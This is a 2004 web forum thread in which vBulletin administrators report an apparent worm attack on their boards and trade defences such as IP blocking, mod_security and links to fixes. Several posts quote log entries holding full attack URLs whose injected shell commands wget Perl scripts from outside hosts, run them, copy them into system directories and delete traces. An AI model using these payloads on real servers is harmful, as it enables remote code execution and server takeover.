Announcement

Collapse
No announcement yet.

Security Warning - How they killed my vb

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Security Warning - How they killed my vb

    Yesterday someone started to attack my server. After some research with my webhoster it turned out to be that vbulletin produced the problems. Using vbulletins loggin system I could catch thos two queries:

    Database error in vBulletin :

    Link-ID == false, connect failed

    mysql error:

    mysql error number: 0

    Date: Sunday 26th of December 2004 08:37:21 AM

    Script:
    http://www.mambers.com/showthread.php?t=11270/showthread.php?amp;t=11270&goto=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20 midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20 midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20 midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20s ess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_1 89f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f08895 55397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess _189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess _189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess _189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113 ;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112 ;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113 ;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112 ;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113 ;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112 ;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113 ;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112 ;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*

    Referer:

    IP Address: 202.172.227.115

    and the second one

    I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vbulletin itself.
    Any help and advise would be appreciated.

  • #2
    looks similar to mine

    http://www.vbulletin.com/forum/showthread.php?t=124241
    http://www.la-kopi.com/images/affiliates/kopi1.gif
    www.la-kopi.com

    Comment


    • #3
      You might want to edit your post and enclose the scripts in a 'code' block or something to keep it from making this page so wide.

      I've been experiencing an 'attack' for over 36 hours now. I looked at my Apache httpd log and 2 or 3 a minute are coming in from all sorts of servers from everywhere (or is spoofing or whatever). I've seen as high as 400 requests an hour. I have done a few searches and in fact came here looking to see if this is happening to others with vBulletin.

      I'm on a dedicated server and haven't had any latency problems - and I don't typically use 10% of my bandwidth each month so it doesn't appear to be a big problem right now.

      I haven't experienced any database errors.

      I'm on FreeBSD - Don't know if that makes a difference.

      I'm assuming it's a variant of the recent phpBB Santy worm/bot (I think it's a perl script bot).

      I'm also interested in whether others are seeing this activity.

      So far I haven't seen any serious effect on my site or forum.
      Last edited by Marc Smith; Sun 26 Dec '04, 2:12am.

      Comment


      • #4
        Originally posted by akonze
        Yesterday someone started to attack my server. After some research with my webhoster it turned out to be that vbulletin produced the problems. Using vbulletins loggin system I could catch thos two queries:

        [...]

        I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vbulletin itself.
        Any help and advise would be appreciated.
        Did they damage anything except causing overload on your server?

        [Edit:]I tried to search for a similar newspost in english but I can only provide a link to heise.de (german slashdot equivalent): http://www.heise.de/newsticker/meldung/54623

        However: The scripts on visualcoders.net have been removed.
        Last edited by Stadler; Sun 26 Dec '04, 2:24am.
        Hints & Tips:
        [[vB3] More Spiders / Indexers / Archives for vB3 - list]|[List of one-time-emails to ban]


        http://sfx-images.mozilla.org/affili...efox_80x15.png

        Comment


        • #5
          This is an example from my Apache httpd log:
          Code:
          66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html HTTP/1.0" 200 5353 "-" "lwp-trivial/1.41"
           66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html/?pda=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 302 0 "-" "LWP::Simple/5.803"
           66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/ HTTP/1.1" 200 8591 "-" "LWP::Simple/5.803"
          This is one more example:
          Code:
          62.101.0.30 - - [26/Dec/2004:02:28:30 -0500] "GET /Forums/showthread.php?t=8514 HTTP/1.0" 200 52354 "-" "lwp-trivial/1.38"
           62.101.0.30 - - [26/Dec/2004:02:28:32 -0500] "GET /Forums/showthread.php?t=8514/index.php?s=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 52674 "-" "LWP::Simple/5.76"
           62.101.0.30 - - [26/Dec/2004:02:28:34 -0500] "GET /Forums/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19651 "-" "LWP::Simple/5.76"
           62.101.0.30 - - [26/Dec/2004:02:28:35 -0500] "GET /Forums/showthread.php?t=8514/forumdisplay.php?amp;f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;
          Last edited by Marc Smith; Sun 26 Dec '04, 2:38am.

          Comment


          • #6
            Originally posted by Stadler
            However: The scripts on visualcoders.net have been removed.
            But this does not seem to remove the problem! When I route my domain to the forum again, this instantly generates a heavy load and traffic.

            And before anyone asks: the server runs php 4.3.10 already.

            Comment


            • #7
              I don't think there's anything you can do to stop it, but if anyone has a way to stop it, I sure am interested. It's annoying even though it doesn't seem to be hurting anything.

              Comment


              • #8
                Well, I first tried to catch all ip adresses used from the attacking bot and block them using .htaccess file (deny from ...). But this doesn't work very well. I easily caught hundreds of ip's and after blocking them, there came up another hundred.

                I now did the following: I moved everything to a new domain name temporary and uploaded a simple index.html redirection file on the old domain.

                I guess we can't do anything untill the worm is gone again...

                Comment


                • #9
                  I checked IPs and they're from everywhere. Virginia, Texas, Poland, England - you name it. The Santy worm that affected phpBB was a Google issue - Used the Google search and Google shut that down. I'd like to know what this is coming from and how. It appears only a few of us here are experiencing the problem.

                  Also note in my two examples aboce there apears to be 2 different things attacking my site.

                  Comment


                  • #10
                    Perhaps filtering these requests using mod_security (www.modsecurity.org) would help a bit. At least it should be worth a try I guess.
                    Hints & Tips:
                    [[vB3] More Spiders / Indexers / Archives for vB3 - list]|[List of one-time-emails to ban]


                    http://sfx-images.mozilla.org/affili...efox_80x15.png

                    Comment


                    • #11
                      I'm definitely not an expert at this stuff. I'll have to take a good look at modsecurity and see if it's within my expertise.

                      Comment


                      • #12
                        this is also happening to me, its used 13gig of bandwidth since yesterday. Has anyone found out how to stop it?
                        My Football Forum

                        Comment


                        • #13
                          I wish - Not that I've seen anywhere. Nor have I seen it mentioned on any virus / worm warning sites or such.

                          Comment


                          • #14
                            See http://www.vbulletin.com/forum/showthread.php?t=124159 - There are 2 fixes there, it appears.

                            Comment


                            • #15
                              thank you
                              My Football Forum

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X